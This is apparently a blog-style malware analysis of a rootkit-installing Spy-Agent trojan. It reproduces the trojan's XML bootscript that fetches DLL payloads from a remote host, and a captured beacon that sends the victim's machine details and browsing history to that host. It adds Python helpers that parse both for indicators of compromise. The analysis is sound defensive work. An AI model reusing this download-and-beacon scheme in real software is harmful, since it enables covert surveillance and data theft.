I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan first contacts a remote site and downloads packages with instructions on how to behave on the machine. The instructions are XML formatted, as in the following excerpt:

<?xml version="1.0" encoding="utf-8" ?>
<bootscript name="CoreApp::UrlMonitor" version="100">
    <downloads>
        <download service_name="CoreApp::UrlMonitor">
            <dll url="http://www.[REMOVED]/UrlMonitor.100.z.img" service_version="100" service_exported_as="UrlMonitor_Message_Handler" deleteable="" default="true" />
        </download>
    </downloads>
    <services>
        <service service_name="CoreApp::UrlMonitor">
           <parameters>
              <tn:data bytes="0">
                 <parameters>
                    <parameter name="browsers">
                       <browser name="IExplore" sname="IEXPLORE_SERVER" />
                       <browser name="Firefox" sname=""  />
                       <browser name="Opera" sname=""  />
                       <browser name="NSShell" sname=""  />
                       <browser name="Netscape6" sname=""  />
                       <browser name="Netscape Browser" sname=""  />
                       <browser name="Mozilla" sname=""  />

This file was named URLMonitor, and it instructs the trojan to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

  • core.101.z.img
  • Notifier.104.z.img
  • URLNotifier.101.z.imo

Several other XML instruction files are downloaded too:

  • bootup.exe.xml
  • UrlMonitor.xml

When active, one of its actions is to watch and report machine information and the URLs visited by the user. Here is an excerpt of a Wireshark network capture:

POST /cmd?op=post_url_ron HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Internet Explorer (compatible)
Host: http://www.[removed].com/
Content-Length: 582
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: AlteonP=xxxxxxxxxxxxxxxxx

<?xml version="1.0" encoding="utf-8"?>
<url-notifier><user-info><user-ip>192.168.x.x</user-ip>
<user-id>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx</user-id>
<pub-id>XX8</pub-id>
<win-majversion>5</win-majversion>
<win-minversion>1</win-minversion>
<win-regkey>xxxxx-xxx-xxxxxxxx-xxxxx</win-regkey>
<useragent>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; V1)</useragent>
<browser-name>iexplore</browser-name>
<browser-version>6.00.2900.2180</browser-version></user-info>
<nids></nids>
<websites><website><name>xx.msn.com</name>
<query-strings></query-strings></website></websites>
</url-notifier>

HTTP/1.1 200 OK
Date: Tue, 12 Jun 2007 xx:xx:xx GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.11 mod_perl/1.29
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

66
<?xml version="1.0" encoding="utf-8" ?>
<notification-command>
<!-- empty -->
</notification-command>
0
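Both the bootscript and the url-notifier beacon above are plain, well-formed XML, which makes them easy to triage mechanically. The following Python is an added example written for this write-up, not code from the sample or from any analysis tool: it pulls the download URLs, exported handler names and monitored browser list out of a bootscript, and extracts the machine fingerprint and visited-site list from a beacon body so an analyst can see exactly what is being reported. The XML inputs are constructed to mirror the excerpts on the page; the hostnames, user-id and the `xmlns:tn` namespace URI (which the original excerpt does not declare) are placeholders.

```python
"""Triage helpers for the XML bootscript and url-notifier beacon traffic.

All sample input below is constructed for illustration and shaped after the
excerpts in the write-up; URLs, ids and the tn: namespace URI are placeholders.
For real malware-supplied XML, prefer defusedxml over the stdlib parser to rule
out entity-expansion tricks; ElementTree is used here so the example runs offline.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed bootscript (placeholder hosts; tn: prefix declared so it parses).
SAMPLE_BOOTSCRIPT = """<?xml version="1.0" encoding="utf-8"?>
<bootscript name="CoreApp::UrlMonitor" version="100" xmlns:tn="urn:placeholder">
  <downloads>
    <download service_name="CoreApp::UrlMonitor">
      <dll url="http://malware.example/UrlMonitor.100.z.img" service_version="100"
           service_exported_as="UrlMonitor_Message_Handler" deleteable="" default="true"/>
    </download>
    <download service_name="CoreApp::Core">
      <dll url="http://malware.example/core.101.z.img" service_version="101"
           service_exported_as="Core_Message_Handler" deleteable="" default="true"/>
    </download>
  </downloads>
  <services>
    <service service_name="CoreApp::UrlMonitor">
      <parameters><tn:data bytes="0"><parameters>
        <parameter name="browsers">
          <browser name="IExplore" sname="IEXPLORE_SERVER"/>
          <browser name="Firefox" sname=""/>
        </parameter>
      </parameters></tn:data></parameters>
    </service>
  </services>
</bootscript>
"""

# Constructed beacon body (placeholder ip, user-id and site names).
SAMPLE_BEACON = """<?xml version="1.0" encoding="utf-8"?>
<url-notifier><user-info><user-ip>192.168.1.10</user-ip>
<user-id>ABCDEF0123456789</user-id><pub-id>XX8</pub-id>
<win-majversion>5</win-majversion><win-minversion>1</win-minversion>
<browser-name>iexplore</browser-name><browser-version>6.00.2900.2180</browser-version>
</user-info><nids></nids>
<websites><website><name>example.msn.com</name><query-strings></query-strings></website>
<website><name>bank.example</name><query-strings>acct=1</query-strings></website></websites>
</url-notifier>"""


def extract_downloads(bootscript_xml: str) -> list[dict]:
    """List every <dll> the bootscript tells the trojan to fetch, with its host
    and the export name the loader will call, for blocklisting and IOC notes."""
    root = ET.fromstring(bootscript_xml)
    found = []
    for dl in root.iter("download"):
        for dll in dl.findall("dll"):
            url = dll.get("url", "")
            found.append({
                "service": dl.get("service_name"),
                "url": url,
                "host": urlparse(url).hostname,
                "version": dll.get("service_version"),
                "export": dll.get("service_exported_as"),
            })
    return found


def monitored_browsers(bootscript_xml: str) -> list[str]:
    """Browser process names the UrlMonitor service is configured to hook."""
    root = ET.fromstring(bootscript_xml)
    return [b.get("name") for b in root.iter("browser")]


def parse_beacon(body: str) -> dict:
    """Summarise what a url-notifier POST leaks: machine fingerprint and sites."""
    root = ET.fromstring(body)
    if root.tag != "url-notifier":
        raise ValueError("not a url-notifier beacon")
    info = root.find("user-info")

    def field(tag: str) -> str:
        return (info.findtext(tag) or "").strip() if info is not None else ""

    return {
        "user_id": field("user-id"),
        "os": f"{field('win-majversion')}.{field('win-minversion')}",
        "browser": f"{field('browser-name')} {field('browser-version')}".strip(),
        "sites": [(w.findtext("name") or "").strip() for w in root.iter("website")],
    }


if __name__ == "__main__":
    for d in extract_downloads(SAMPLE_BOOTSCRIPT):
        print(f"download {d['url']} -> export {d['export']} (v{d['version']})")
    print("hooked browsers:", monitored_browsers(SAMPLE_BOOTSCRIPT))
    print("beacon:", parse_beacon(SAMPLE_BEACON))
```

`extract_downloads` gives the list of hosts and payload names to watch for at the proxy, while `parse_beacon` makes the exfiltrated fields explicit: the user-id acts as a stable victim identifier across beacons, and every visited site name is reported, which is the detail to confirm when scoping exposure. The `url-notifier` root tag and the `op=post_url_ron` request line from the capture are the simplest network signatures for this traffic.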

So, as you can see, both the reported information and the communication itself are very cleanly formatted, using XML.

Looks like we are getting into the XML trojans…:)